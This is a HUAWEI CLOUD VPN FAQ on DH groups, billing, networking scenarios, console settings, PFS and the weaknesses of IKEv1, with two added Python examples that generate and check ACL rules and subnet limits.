Table 2-2 lists the bits corresponding to the DH groups used by VPN.

Table 2-2 Bit corresponding to each DH group

DH Group | Modulus
1 | 768 bits
2 | 1024 bits
5 | 1536 bits
14 | 2048 bits
15 | 3072 bits
16 | 4096 bits
19 | ECP, 256 bits
20 | ECP, 384 bits
21 | ECP, 521 bits

NOTE

The following DH algorithms have security risks and are not recommended: DH group 1, DH group 2, and DH group 5.


2.24 Can I Visit Websites Across International Borders Using a VPN?

No.

VPN connects a VPC and the network of an on-premises data center, that is, a site-to-site connection.

2.25 Can I Deploy Applications on the Cloud, Databases in an On-premises Data Center, and Then Connect Them Through a VPN?

VPN connects a VPC and an on-premises network.

After the VPN is set up successfully, the VPC and the on-premises network can communicate with each other. In this case, the application server accesses the database just as it accesses other servers in the same LAN.

Servers on the cloud and those in the data center can communicate with each other.

NOTICE

● After a VPN is set up, check whether the network latency and packet loss adversely affect service running.

● It is recommended that you run the ping command to check the packet loss and network latency details.

2.26 What Are the Differences Between the Application Scenarios and Connection Modes of IPsec and SSL VPNs?

Scenarios

IPsec VPN connects two LANs, such as a branch and its headquarters, or a local IDC and a VPC.

SSL VPN connects a client to a LAN. For example, the portable computer of an employee on a business trip accesses the internal network of the company.

Connection Modes

IPsec VPN requires fixed gateways, such as firewalls or routers, at both ends. The administrator needs to configure gateways at both ends to complete IPsec VPN negotiation.


SSL VPN requires specified client software to be installed on the server, which connects to the SSL device using a username and password.

NOTE

HUAWEI CLOUD only supports IPsec VPNs.

2.27 What Will I Be Billed for Creating a VPN? Will I Be Billed for VPN Gateway IP Addresses?

VPNs are billed on a yearly/monthly or pay-per-use basis. You need to pay for both the VPN gateway bandwidth or traffic price and the VPN connection price.

VPN gateways can be billed by traffic or bandwidth.

1. A yearly/monthly VPN gateway can only be billed by bandwidth. The price of a yearly/monthly VPN gateway includes the price of the VPN connections that can be created for the gateway and the bandwidth price.

2. The billing cycle of the pay-per-use billing mode is one hour. If you choose a pay-per-use VPN gateway, a VPN connection must be purchased together with the VPN gateway. The price includes the VPN gateway bandwidth or traffic price and the price of the VPN connection created together with the gateway. If you create another connection for the gateway, you will be charged for the additional connection.

NOTE

● The IP address of the VPN gateway will not be billed.

● A VPN gateway cannot share a bandwidth with an EIP bound to an ECS.

2.28 What Is the Difference Between Billing a VPN Gateway by Bandwidth and by Traffic?

The details are as follows:

If you select the pay-per-use billing mode, both billing by bandwidth and billing by traffic are supported.

● If billing by bandwidth is selected, the billing cycle is one hour. The generated fee depends on the bandwidth size.


● If billing by traffic is selected, the traffic fees generated each hour will be collected. The bandwidth size does not affect the price of the public traffic per GB. The billing is based on the generated traffic going out of a VPC.

2.29 Can a VPN Billed by Traffic Use a Shared Data Package?

No.

The VPN service is billed independently and cannot use the shared data package.

2.30 Can a VPN Gateway IP Address Be Retained After the VPN Gateway Is Deleted?

No. The VPN gateway IP address will be released after the VPN gateway is deleted.

Deleting a VPN gateway will also delete the resources associated with the gateway.

NOTICE

Deleting the last connection of a pay-per-use VPN gateway will also delete the gateway. If you want to retain the IP address, do not delete the last VPN connection.

2.31 Do I Need to Purchase an EIP for Servers That Communicate with Each Other Through a VPN?

If a server in your data center needs to access an ECS on the cloud through a VPN, you do not need to purchase an EIP.

If the ECS needs to provide services accessible from the Internet, an EIP is required.

2.32 Where Can I Add a Route to Reach the Remote Subnet on the VPN Console?

When a VPN connection is created, a route to reach the remote subnet is automatically delivered.

2.33 Will I Be Notified If a VPN Connection Is Interrupted?

The VPN connection status can be monitored. After a VPN connection is created, the VPN service reports the connection status information to Cloud Eye, but does not automatically send alarm notifications to you. To receive notifications, create alarm rules and enable Alarm Notifications on the Cloud Eye console.

After a VPN connection is created, you can locate the row that contains the VPN connection and choose Operation > View Metric to view the VPN connection status.

Figure 2-5 View Metric

2.34 What Can I Do If VPN Connection Setup Fails?

1. Check the IKE and IPsec policies to see whether the negotiation modes and encryption algorithms between the local and remote sides of the VPN are the same.

a. If the IKE policy has been set up during phase one and the IPsec policy has not been enabled in phase two, the IPsec policies between the local and remote sides of the VPN may be inconsistent.

b. If a Cisco physical device is used at the customer side, it is recommended that you use MD5. Then, set Authentication Mode to MD5 in the IPsec policy for the VPN created on the cloud.

2. Check whether the ACL configurations are correct. If the subnets of your data center are 192.168.3.0/24 and 192.168.4.0/24, and the VPC subnets are 192.168.1.0/24 and 192.168.2.0/24, configure the ACL rules for each data center subnet to allow communication with the VPC subnets. The following provides an example of ACL configurations:

rule 1 permit ip source 192.168.3.0 0.0.0.255 destination 192.168.1.0 0.0.0.255
rule 2 permit ip source 192.168.3.0 0.0.0.255 destination 192.168.2.0 0.0.0.255
rule 3 permit ip source 192.168.4.0 0.0.0.255 destination 192.168.1.0 0.0.0.255
rule 4 permit ip source 192.168.4.0 0.0.0.255 destination 192.168.2.0 0.0.0.255

3. After the configuration is complete, ping the local and the remote side from each other to check whether the VPN connection is normal.
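The four ACL rules in step 2 are the full cross product of data center subnets and VPC subnets, and a pair that no rule permits never enters the tunnel (see also 3.7). The following added example, not code from this FAQ or from any device vendor, generates that rule list from the two subnet lists and reads a rule list back to find uncovered pairs; the rule syntax is the one quoted on this page, the function names are ours.

```python
"""Generate and check the interesting-traffic ACL rules shown in step 2 of this FAQ:
one "rule N permit ip source A W destination B W" line per data center subnet and
VPC subnet pair, where W is the wildcard (inverted) mask. Added example: the rule
syntax is the one quoted on this page; the function names are ours."""
import ipaddress
from itertools import product
from typing import List, Tuple

IPv4 = ipaddress.IPv4Network


def acl_rules(dc_subnets: List[str], vpc_subnets: List[str], start: int = 1) -> List[str]:
    """One permit rule for every (data center subnet, VPC subnet) pair.

    Two subnets on each side, as in the FAQ's example, give 2 x 2 = 4 rules.
    hostmask is the wildcard mask: 0 bits must match, 1 bits are don't-care."""
    rules = []
    for n, (src, dst) in enumerate(product(dc_subnets, vpc_subnets), start):
        s = ipaddress.ip_network(src, strict=False)
        d = ipaddress.ip_network(dst, strict=False)
        rules.append(f"rule {n} permit ip source {s.network_address} {s.hostmask} "
                     f"destination {d.network_address} {d.hostmask}")
    return rules


def parse_rule(rule: str) -> Tuple[IPv4, IPv4]:
    """Read back (source, destination) networks from a permit rule.

    ipaddress accepts 'address/wildcard' (e.g. 192.168.3.0/0.0.0.255) directly."""
    t = rule.split()
    if len(t) < 10 or t[2] != "permit" or t[4] != "source" or t[7] != "destination":
        raise ValueError(f"not a permit rule: {rule}")
    return (ipaddress.ip_network(f"{t[5]}/{t[6]}", strict=False),
            ipaddress.ip_network(f"{t[8]}/{t[9]}", strict=False))


def uncovered_pairs(rules: List[str], dc_subnets: List[str],
                    vpc_subnets: List[str]) -> List[Tuple[str, str]]:
    """(data center subnet, VPC subnet) pairs that no rule permits.

    Only traffic matching the ACL enters the tunnel (3.7), so a missing pair means
    that traffic between those two subnets never uses the VPN."""
    permits = [parse_rule(r) for r in rules]
    missing = []
    for src, dst in product(dc_subnets, vpc_subnets):
        s = ipaddress.ip_network(src, strict=False)
        d = ipaddress.ip_network(dst, strict=False)
        if not any(s.subnet_of(ps) and d.subnet_of(pd) for ps, pd in permits):
            missing.append((src, dst))
    return missing


if __name__ == "__main__":
    dc = ["192.168.3.0/24", "192.168.4.0/24"]      # data center subnets from the FAQ
    vpc = ["192.168.1.0/24", "192.168.2.0/24"]     # VPC subnets from the FAQ
    rules = acl_rules(dc, vpc)
    print("\n".join(rules))
    # Constructed mistake: the fourth rule was left out of the device configuration.
    print("uncovered:", uncovered_pairs(rules[:3], dc, vpc))
```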

2.35 Which Direction of the Bandwidth Is Limited and What Is the Unit of the Bandwidth?

Your purchased VPN gateway bandwidth is used in the outbound direction. To balance the traffic in the inbound and outbound directions, the bandwidth in the inbound direction is limited.


● If the purchased bandwidth is less than or equal to 10 Mbit/s, the bandwidth in the inbound direction is limited to 10 Mbit/s.

● If the purchased bandwidth is more than 10 Mbit/s, the bandwidth in the inbound direction is the same as the purchased bandwidth.

The unit of bandwidth is Mbit/s and that of traffic is GB.


3 Networking and Application Scenarios

3.1 Can I Visit Websites Across International Borders Using a VPN?

No.

VPN connects a VPC and the network of an on-premises data center, that is, a site-to-site connection.

3.2 Can I Deploy Applications on the Cloud, Databases in an On-premises Data Center, and Then Connect Them Through a VPN?

VPN connects a VPC and an on-premises network.

After the VPN is set up successfully, the VPC and the on-premises network can communicate with each other. In this case, the application server accesses the database just as it accesses other servers in the same LAN.

Servers on the cloud and those in the data center can communicate with each other.

NOTICE

● After a VPN is set up, check whether the network latency and packet loss adversely affect service running.

● It is recommended that you run the ping command to check the packet loss and network latency details.


3.3 How Many VPN Connections Do I Need to Connect to Multiple Servers in a Data Center?

HUAWEI CLOUD IPsec VPN connects a VPC on the cloud and subnets in your on-premises data center. Therefore, the number of VPN connections is irrelevant to the number of servers, but is related to the number of data centers where the servers are located.

In most cases, an on-premises data center has a public network gateway. All servers connect to the Internet through this gateway. Therefore, you only need to configure one VPN connection to allow communications between the HUAWEI CLOUD VPC and your network.

3.4 Do I Need to Install the IPsec Software on Each Server That Needs to Access an ECS to Establish a VPN Connection?

No.

HUAWEI CLOUD VPN connects two LANs. Multiple servers in the customer data center use the same public IP address to access the cloud. If you install the IPsec software on the servers, the VPN gateway on the cloud will receive negotiation packets from different servers, and the system then receives a large amount of repeated negotiation information, which causes connection exceptions or even connection unavailability.

It is recommended that you use the egress firewall to configure a VPN to connect to the cloud. When creating a VPN, you can specify multiple CIDR blocks. You should only allow servers of developers to access the ECS on the cloud based on the security group on the cloud or the security rules of the customer data center.

3.5 What Are the Differences Between the Application Scenarios and Connection Modes of IPsec and SSL VPNs?

Scenarios

IPsec VPN connects two LANs, such as a branch and its headquarters, or a local IDC and a VPC.

SSL VPN connects a client to a LAN. For example, the portable computer of an employee on a business trip accesses the internal network of the company.


Connection Modes

IPsec VPN requires fixed gateways, such as firewalls or routers, at both ends. The administrator needs to configure gateways at both ends to complete IPsec VPN negotiation.

SSL VPN requires specified client software to be installed on the server, which connects to the SSL device using a username and password.

NOTE

HUAWEI CLOUD only supports IPsec VPNs.

3.6 Does a VPN Allow for Communications Between Two VPCs?

● If the two VPCs are deployed in the same region, use a VPC peering connection to connect them.

● If the two VPCs are deployed in different regions, use a VPN connection to connect them. The detailed operations are as follows:

a. Create a VPN gateway for each VPC and create VPN connections for the two VPN gateways.

b. Set the remote gateway address of each VPN connection to the gateway IP address of the peer side.

c. Set the remote subnet of each VPN connection to the CIDR block of the peer VPC.

d. The pre-shared keys and algorithm parameters of the two VPN connections must be the same.

3.7 What Are the Impacts of a VPN on an On-premises Network? What Are the Changes to the Route for Accessing an ECS?

When you configure a VPN, configure the following on the gateway of the on-premises data center.

1. Configure IKE/IPsec policies.


2. Specify interesting traffic (ACL rules).

3. Check the route of the gateway in the on-premises data center to ensure that traffic destined for the HUAWEI CLOUD VPC is routed to the correct egress interface (the interface with the IPsec policy bound).

After the VPN configuration is complete, only the traffic matching the ACL rules enters the VPN tunnel.

For example, before a VPN is created, on-premises users access the ECS through the EIP bound to the ECS. After the VPN is created, data flows matching the ACL rules access the private IP address of the ECS through the VPN tunnel.

3.8 What Configurations Are Required on Both Ends of a VPN to Implement the Communication Between a Customer Data Center and a VPC?

To implement the VPN interconnection, create a VPN on the cloud and configure the gateway device of the customer data center.

● Creating a VPN on the cloud: Buy a VPN gateway (select the billing mode, bandwidth size, and the VPC to be associated). Buy a VPN connection (specify the gateway IP addresses, subnets, and negotiation policies at both ends).

● Configuring the VPN device of the customer data center: Select the public IP address of the customer data center, configure the first and second phases of IPsec negotiation on the device that supports IPsec VPN, and then configure network routes, NAT, and security rules.

3.9 Can I Use a Network with Two Egresses to Establish Two VPN Connections with the Same VPC?

No.

When creating a VPN connection, the local subnet is a VPC subnet and the remote subnet is a subnet of the on-premises data center. If the two connections used the same local subnet and remote subnet, their traffic policies would be identical and the VPN connections would fail.

3.10 Can I Connect Two VPCs in the Same Region Through a VPN?

No.

For two VPCs in the same region, you can use a VPC peering or Cloud Connectconnection to connect them.

3.11 How Can I Connect Two VPCs in the Same Region?

Two VPCs in the same region can be connected using a VPC peering or Cloud Connect connection. VPC Peering can only connect VPCs in the same region, whereas Cloud Connect can also connect VPCs in different regions.

3.12 How Do I Replace a Direct Connect Connection with a VPN?

1. Ensure that the gateway of the on-premises data center supports IPsec VPN.

2. Create a VPN gateway (select the VPC that the Direct Connect connection uses) and a VPN connection on HUAWEI CLOUD.

NOTICE

When creating a VPN connection, configure its remote subnet in one of the following ways to avoid routing conflicts.

● Delete the virtual interface of the Direct Connect connection first and then configure the VPN connection.

● Divide the remote subnet into two subnets and configure the VPN connection. After the Direct Connect connection is deleted, configure the VPN connection again.

3.13 How Do I Enable Communication Among Two VPCs and an IDC Network?

Network Topology

IDC - VPC 1 - VPC 2

NOTE

IDC indicates the on-premises data center. A VPN connection is established between VPC 1 and the IDC.

Procedure

1. Check whether the two VPCs are in the same region.

– If the two VPCs are in the same region, use a VPC peering or Cloud Connect connection (free of charge) to connect them.

– If the two VPCs are in different regions, use a Cloud Connect connection (you need to pay the bandwidth fee).

2. Establish a VPN connection between the IDC and VPC 1. On the IDC side, configure the remote subnets to include the subnets of both VPC 1 and VPC 2. On the cloud side, the local subnets of the VPN connection must include the VPC 2 subnet that is reachable through the VPC peering or Cloud Connect connection, and VPC 2 must have a route through the VPC peering or Cloud Connect connection whose destination is the IDC subnet.

3.14 How Do I Connect Four Subnets?

Figure 3-1 shows the network topology.

Figure 3-1 Network Topology

1. Use a VPN or Direct Connect connection to connect IDC 1 to VPC 1.

2. Use a Cloud Connect connection to connect VPC 1 to VPC 2. (You can also use a VPC peering connection to enable communication between VPC 1 and VPC 2 if they are in the same region.)

3. Use a VPN or Direct Connect connection to connect IDC 2 to VPC 2.

4. Configure routes for the four subnets involved in the VPN, Cloud Connect, and Direct Connect connections to enable communication between them.

3.15 Do I Need Two VPN Connections to Connect Four Subnets of Two Regions If Each Region Has Two Subnets?

No.

Only one VPN connection is required between two regions. All the subnets can be added to that VPN connection.

In this scenario, if you attempt to create a second VPN connection, the management console displays a message indicating that a conflict occurs because the two connections have the same remote gateway address.

3.16 Can I Access OBS Through a VPN?

Yes.

With the help of the VPC Endpoint Service, you can access OBS through a VPN. Create two VPC endpoints, one for the private DNS server and one for OBS.

On the customer side, configure the HUAWEI CLOUD private DNS server and a route to it.

3.17 How Do I Interconnect My Personal Computer with a VPN?

Common home broadband routers, personal mobile terminals, and VPN services (such as L2TP) provided by Windows hosts cannot interconnect with HUAWEI CLOUD VPN.

To interconnect with HUAWEI CLOUD VPN, on-premises devices must support the standard IPsec protocol.

3.18 How Do I Access HUAWEI CLOUD ECSs From Home After My Enterprise Network Is Connected to HUAWEI CLOUD Through a VPN?

HUAWEI CLOUD VPN connects the VPC on the cloud and the local area network (LAN) off the cloud.

The home network is not a part of the LAN of your enterprise and cannot be directly connected to the VPC on the cloud.

If your host at home needs to access VPC resources on the cloud, it can directly access the EIP of the cloud service, or connect to the LAN of your enterprise through SSL VPN (if your enterprise supports SSL access) and then access VPC resources on the cloud through the LAN.

3.19 How Do I Create a VPN Connection Temporarily If No Device That Supports IPsec Is Available off the Cloud After I Purchase HUAWEI CLOUD VPN Gateway and Connections?

To establish a VPN connection with HUAWEI CLOUD, a device that supports standard IPsec and a fixed public IP address must be available off the cloud.

To connect to HUAWEI CLOUD temporarily, install third-party IPsec software on a host that has a fixed public IP address.

Recommended third-party IPsec software: strongSwan, Openswan, and GreenBow. For details, see the Virtual Private Network Administrator Guide.

3.20 How Do I Select a Proper Region on the Cloud When Creating a VPN Gateway?

It is recommended that you create the VPN gateway in the region closest to your on-premises data center, to reduce network latency.

However, you can select a VPC in any region when you create a VPN gateway.

● For multiple VPCs in the same region, you only need to create one VPN gateway, because the VPCs can be connected to each other using VPC peering connections (free of charge).

● For multiple VPCs across regions, you can use VPN and Cloud Connect connections to connect them.

4 Billing and Payments

4.1 What Will I Be Billed for Creating a VPN? Will I Be Billed for VPN Gateway IP Addresses?

VPNs are billed on a yearly/monthly or pay-per-use basis. You need to pay for both the VPN gateway (bandwidth or traffic price) and the VPN connections.

VPN gateways can be billed by traffic or by bandwidth.

1. A yearly/monthly VPN gateway can only be billed by bandwidth. The price of a yearly/monthly VPN gateway includes the price of the VPN connections that can be created for the gateway and the bandwidth price.

2. The billing cycle of the pay-per-use billing mode is one hour. If you choose a pay-per-use VPN gateway, a VPN connection must be purchased together with the VPN gateway. The price includes the VPN gateway bandwidth or traffic price and the price of the VPN connection created together with the gateway. If you create another connection for the gateway, you will be charged for the additional connection.

NOTE

● The IP address of the VPN gateway will not be billed.

● A VPN gateway cannot share a bandwidth with an EIP bound to an ECS.

4.2 What Is the Difference Between Billing a VPN Gateway by Bandwidth and by Traffic?

The pay-per-use billing mode for VPN gateways supports both billing by bandwidth and billing by traffic. Their differences are as follows:

● Billing by bandwidth: The billing cycle is one hour. The generated fee depends on the bandwidth size.

● Billing by traffic: The traffic fees generated each hour are collected. The billing is based on the traffic going out of a VPC. The bandwidth size does not affect the price per GB of public traffic.

4.3 Can a VPN Billed by Traffic Use a Shared Data Package?

No.

The VPN service is billed independently and cannot use the shared data package.

4.4 How Many VPN Connections Will I Be Charged to Connect VPCs in Different Regions?

VPNs can be used to connect VPCs in different regions. The VPN bandwidth and connections of each region are billed independently. Example:

In Region A, you establish one VPN connection with Region B and another VPN connection with Region C. Then:

● The VPN gateway of Region A has two connections.

● The VPN gateway of Region B has one connection.

● The VPN gateway of Region C has one connection.

In this case, you will be charged for four VPN connections.

4.5 When Will VPN Resources Be Frozen? How Can I Unfreeze VPN Resources?

● If pay-per-use VPN resources are in arrears, they enter the retention period and are frozen. Frozen resources are unavailable and cannot be modified or deleted. If the retention period ends and you still have not topped up your account and paid off the arrears, the resources are released and cannot be restored. To keep the resources available, top up your account and pay off the arrears before the retention period ends.

● Frozen VPN resources become available again after you renew them or top up your account. If a VPN connection is then in the Not connected state, initiate data flows (for example, ping hosts in the peer subnet) to trigger negotiation and bring the VPN connection back to the normal state.

5 Related Operations on the Console

5.1 What Are the Relationships Between a VPC, a VPN Gateway, and a VPN Connection?

● A VPC is a private network on the cloud. Multiple VPCs can be created in the same region but are isolated from each other. A VPC can be divided into multiple subnets.

● A VPN gateway is created based on a VPC and is the access point of a VPN connection. Only one VPN gateway can be purchased for each VPC, but multiple VPN connections can be created for each gateway.

● A VPN connection is created based on a VPN gateway and is used to connect a VPC to an on-premises data center (or a VPC in another region). That is, each VPN connection connects to one gateway of an on-premises data center.

NOTE

The number of VPN connections is irrelevant to the number of local subnets and remote subnets. It is only related to the number of data centers (or VPCs in other regions) connected to your VPC. The created VPN connections are displayed in the VPN connection list. You can also view the number of VPN connections created for each VPN gateway.

5.2 How Long Does It Take for Delivered VPN Configurations to Take Effect?

It takes 1 to 5 minutes for the VPN configurations to take effect.

NOTE

After the VPN configurations take effect, configure the gateway on your side to complete tunnel negotiation with the VPN gateway on HUAWEI CLOUD. Then, the VPN connection is successfully established.

5.3 Why Is the VPN Connection Always in the Not Connected State Even After Its Configuration Is Complete?

Ensure that the pre-shared keys and negotiation parameters at both ends are consistent, and that the local and remote settings are mirrored: the local subnet and VPN gateway configured on the cloud are the remote subnet and remote gateway on the on-premises device, and the remote gateway and remote subnet configured on the cloud are the local gateway and local subnet on the on-premises device.

Ensure that the routing, NAT, and security rules are correctly configured on the gateway device of your on-premises data center. Then, ping servers in the subnets at both ends.

NOTE

VPN negotiation is triggered by data flows. After you configure the VPN, ping a server in the peer subnet. Before running the ping command, allow inbound ICMP in the server's firewall (or disable the firewall for the duration of the test) and allow inbound ICMP requests in the security group on the cloud. Pinging the gateway IP address does not trigger VPN negotiation; ping a server in the subnet protected by the gateway.

5.4 Can a VPN Gateway IP Address Be Retained After the VPN Gateway Is Deleted?

No. The VPN gateway IP address is released after the VPN gateway is deleted.

Deleting a VPN gateway also deletes the resources associated with the gateway.

NOTICE

Deleting the last connection of a pay-per-use VPN gateway also deletes the gateway. If you want to retain the IP address, do not delete the last VPN connection.

5.5 Do I Need to Create a VPN Gateway or a VPN Connection for Creating a VPN? Which Information About a Created VPN Can Be Modified?

Prerequisites for creating a VPN

Create a VPC and a VPC subnet. The VPC subnet must not overlap with the subnet of the on-premises data center.

To create a VPN, you need to:

● Create a VPN gateway. The gateway IP address and bandwidth are assigned at creation. Set Region, Name, Billing Mode, VPC to be associated, Billed By, and Bandwidth. Only Name and Bandwidth can be modified after the VPN gateway is created.

● Create a VPN connection. Specify the connection name, associated VPN gateway, local subnet, PSK, remote gateway, remote subnet, and negotiation policies. The connection name, local subnet, PSK, remote gateway, remote subnet, and negotiation policies can be modified after the VPN connection is created.

5.6 Do I Need to Configure ACL Rules on the HUAWEI CLOUD Management Console After I Configured ACL Rules on the Gateway Device of the On-premises Data Center?

No. The ACL rules you configure on the gateway device of the on-premises data center apply only to that device; they are referenced by its IPsec policies.

On the cloud, you do not configure ACL rules directly. When you create the VPN connection on the management console, the ACL rules are generated automatically from the local and remote subnets you enter and are delivered to the VPN gateway. The number of generated ACL rules is the number of local subnets multiplied by the number of remote subnets.

5.7 What Do I Do If an Exception Occurs When I Add a Remote Subnet During VPN Connection Creation?

Check whether this remote subnet has already been used as the destination of a VPC peering, Cloud Connect, or Direct Connect connection route, which causes a routing conflict. If so, delete that route and create a new one.

5.8 Where Can I Add a Route to Reach the Remote Subnet on the VPN Console?

When a VPN connection is created, a route to the remote subnet is delivered automatically.

5.9 Can I Perform Operations on HUAWEI CLOUD VPNs Using APIs?

VPN requires complex configurations. Currently, VPN resources cannot be created, queried, or modified through APIs. You can perform these operations only on the management console.

5.10 What Is a Remote Gateway and Remote Subnet in a VPN Connection?

When creating a VPN connection, a subnet in the HUAWEI CLOUD VPC is the local subnet and the created VPN gateway is the local gateway. The connected subnet in the on-premises data center is the remote subnet and the gateway in the on-premises data center is the remote gateway.

A remote gateway IP address is a public network IP address.

5.11 How Do I Disable the PFS Function When Creating a VPN Connection?

In some regions on HUAWEI CLOUD, you can disable Perfect Forward Secrecy (PFS) when creating a VPN connection. You are advised to keep PFS enabled on the cloud and to enable it on the on-premises device as well, because PFS protects the phase 2 (IPsec SA) keys: they are derived from a fresh DH exchange rather than from the phase 1 key.

By default, PFS is disabled on some vendors' devices. Check the device configuration manual to ensure that PFS is enabled.

NOTE

● PFS is a security feature. IKE negotiation has two phases. The key of phase two (the IPsec SA) is derived from the key generated in phase one, so if the phase one key is disclosed, the security of the IPsec VPN may be affected. To improve key security, IKE provides PFS: when PFS is enabled, an additional DH exchange is performed during IPsec SA negotiation and a fresh IPsec SA key is generated from it.

● To ensure security, PFS is enabled on HUAWEI CLOUD by default. Ensure that PFS is also enabled on the gateway in your on-premises data center; otherwise, the negotiation will fail.

5.12 What Is the Limitation on the Number of Local and Remote Subnets of a VPN? Why Is an Error Message Displayed When I Update the Local Subnet by Specifying a CIDR Block?

● You can configure up to 5 local subnets. The product of the number of local subnets and the number of remote subnets cannot exceed 255.

● A VPC delivers VPC subnet routes based on the remote subnets of the VPN connection, the remote subnets of the Direct Connect connection, and the subnets of the VPC peering connection. Each subnet has one subnet route.

● The number of VPC subnet routes cannot exceed 200. That is, the total number of remote subnets of the VPN connection, remote subnets of the Direct Connect connection, subnets of the VPC peering connection, and custom routes in a VPC cannot exceed 200.

5.13 What Are the Precautions for Configuring the Local and Remote Subnets of a VPN Connection?

● You can configure up to 5 local subnets. The product of the number of local subnets and the number of remote subnets cannot exceed 255. If 255 is exceeded, consider supernetting the local or remote subnets.

● The local subnet cannot include the CIDR block of the remote subnet.

● There must be routes pointing to the local subnet in the VPC where the VPN gateway resides.

● If two connections (connection A and connection B) are created for one VPN gateway and the remote subnet of connection A is within that of connection B, then for a destination in the overlapping network segment the connection created first is matched first, regardless of the connection status. (Longest-prefix matching is not used for the policy-based VPN.)
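The subnet rules in 5.6, 5.12 and 5.13 can be checked before a connection is created. The following Python script is an added example, not part of the HUAWEI CLOUD documentation or console: it applies the limits stated above (5 local subnets, 255 ACL rules, no local subnet containing a remote subnet) to a proposed configuration, generates the (local, remote) ACL rule pairs the console would derive, and shows why the creation order of connections with overlapping remote subnets decides policy-based matching. All subnet values are constructed for the demonstration.

```python
"""Pre-flight checks for the local/remote subnets of a policy-based VPN
connection, following the limits this FAQ states: at most 5 local
subnets, at most 255 (local x remote) ACL rules, a local subnet must not
contain a remote subnet, and when the remote subnets of two connections
on one gateway overlap, the connection created first is matched first
regardless of mask length or status."""
import ipaddress
from itertools import product

MAX_LOCAL_SUBNETS = 5
MAX_ACL_RULES = 255


def _parse(cidrs):
    # strict=True rejects a CIDR with host bits set, e.g. 10.0.0.1/24
    return [ipaddress.ip_network(c, strict=True) for c in cidrs]


def acl_rules(local_subnets, remote_subnets):
    """The rules the console generates: one (local, remote) pair each,
    so their number is len(local) * len(remote)."""
    return [(str(l), str(r))
            for l, r in product(_parse(local_subnets), _parse(remote_subnets))]


def validate_connection(local_subnets, remote_subnets):
    """Return a list of problems; an empty list means the configuration is acceptable."""
    problems = []
    local, remote = _parse(local_subnets), _parse(remote_subnets)
    if len(local) > MAX_LOCAL_SUBNETS:
        problems.append(f"{len(local)} local subnets configured; "
                        f"at most {MAX_LOCAL_SUBNETS} are allowed")
    rules = len(local) * len(remote)
    if rules > MAX_ACL_RULES:
        problems.append(f"{rules} ACL rules would be generated; the limit is "
                        f"{MAX_ACL_RULES}, consider supernetting")
    for l, r in product(local, remote):
        if r.subnet_of(l):
            problems.append(f"local subnet {l} contains remote subnet {r}")
        elif l.overlaps(r):
            problems.append(f"local subnet {l} overlaps remote subnet {r}")
    return problems


def match_connection(connections, destination):
    """connections: [(name, remote_subnets)] in creation order.
    Policy-based matching as described in 5.13: the first connection whose
    remote subnet covers the destination wins; longest-prefix matching is not used."""
    dst = ipaddress.ip_address(destination)
    for name, remote_subnets in connections:
        if any(dst in net for net in _parse(remote_subnets)):
            return name
    return None


if __name__ == "__main__":
    # constructed configurations
    print(validate_connection(["10.0.0.0/8"], ["10.1.0.0/16"]))
    conns = [("A", ["172.16.1.0/24"]), ("B", ["172.16.0.0/16"])]
    # A wins when created first; B wins when created first, even though
    # A's /24 is the more specific match.
    print(match_connection(conns, "172.16.1.5"), match_connection(conns[::-1], "172.16.1.5"))
```

Run the validation before submitting a connection on the console; the overlap check also catches the 5.5 prerequisite that the VPC subnet must not overlap the on-premises subnet, which the console reports only as a generic error.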

5.14 Why Is the Status of a VPN Connection Not Connected on the Management Console When It Is Already Available?

There is a delay before the management console displays the latest VPN connection status.

If service access works, the VPN connection is established. After several minutes, the VPN connection status changes to Connected.

5.15 What Do I Do If a Message Is Displayed Indicating That the VPN Connection Does Not Exist After Negotiation Policies Are Modified?

This problem is caused by the page refresh interval.

When you modify the advanced settings, the system first deletes the VPN connection and then creates a new one. If the page displays a message indicating that the connection is being deleted or created for a short period of time, do not create the same connection (with the same local subnet, remote subnet, and remote gateway) again.

If the page remains in the connection deleting or creating state for a long time, submit a service ticket.

5.16 What Should I Do If I Cannot Create Connections for a VPN Gateway That Has No Bandwidth Information?

If a VPN gateway has no bandwidth information, it is a VPN of the old edition, and this type of VPN can no longer be created on HUAWEI CLOUD.

● Only one VPN connection can be created for each VPN gateway of the old edition, and its bandwidth is not guaranteed. You can delete the gateway and create one of the new edition (running services will be affected).

● You can also submit a service ticket to change the gateway to one of the new edition (running services will not be affected). By default, the bandwidth of a VPN gateway changed to the new edition is 10 Mbit/s. You can adjust the bandwidth as required. The bandwidth of a VPN gateway that is billed on a yearly/monthly basis cannot be decreased.

5.17 How Do I Reset a VPN Connection?

● Disable the VPN connection on the device off the cloud. After the status of the VPN connection on the cloud changes to Not connected, enable the VPN connection on the device off the cloud again.

● Alternatively, change the remote gateway IP address of the VPN connection on the cloud to any other IP address. After the status of the connection off the cloud changes to inactive, change the remote gateway IP address on the cloud back to the real IP address.

5.18 What Is the Maximum Bandwidth Supported by a VPN Gateway?

The maximum bandwidth supported by a VPN gateway is 300 Mbit/s.

5.19 Which IKE Version Should I Select When I Create a VPN Connection?

HUAWEI CLOUD recommends that you select IKEv2 for negotiation, because IKEv1 has known security weaknesses. In addition, IKEv2 performs better than IKEv1 in connection negotiation and establishment, authentication methods, DPD timeout handling, and SA timeout handling.

HUAWEI CLOUD will stop supporting IKEv1 in the near future.

Introduction to IKEv1 and IKEv2

● IKEv1 is a hybrid protocol, and its complexity inevitably brings security and performance defects that have become a bottleneck of current IPsec deployments.

● IKEv2 keeps the basic functions of IKEv1 and fixes the problems found in IKEv1. For simplicity, efficiency, security, and robustness, the original IKE documents were replaced by RFC 4306 (itself since superseded by RFC 5996 and then RFC 7296). By minimizing core functions and specifying default cryptographic algorithms, IKEv2 greatly improves interoperability between different IPsec VPN implementations.

IKEv1 Security Weaknesses

● The cryptographic algorithms supported by IKEv1 have not been updated for more than 10 years, and IKEv1 does not support modern authenticated encryption algorithms such as AES-GCM and ChaCha20-Poly1305. In IKEv1, the E (Encryption) bit in the ISAKMP header indicates that the payloads following the header are encrypted, but integrity protection of those payloads is handled by a separate hash payload. This separation of encryption from integrity protection prevents the use of authenticated encryption (AES-GCM) with IKEv1.

● IKEv1 is vulnerable to DoS amplification attacks and to resource exhaustion through half-open connections. IKEv2 mitigates these attacks with its cookie mechanism (RFC 7296, section 2.6).

● IKEv1 aggressive mode is not secure enough. In aggressive mode, the identity payloads and the authentication hash are sent unencrypted, which exposes the peers' identities and, with pre-shared key authentication, lets an attacker who captured or initiated the exchange brute-force the PSK offline.
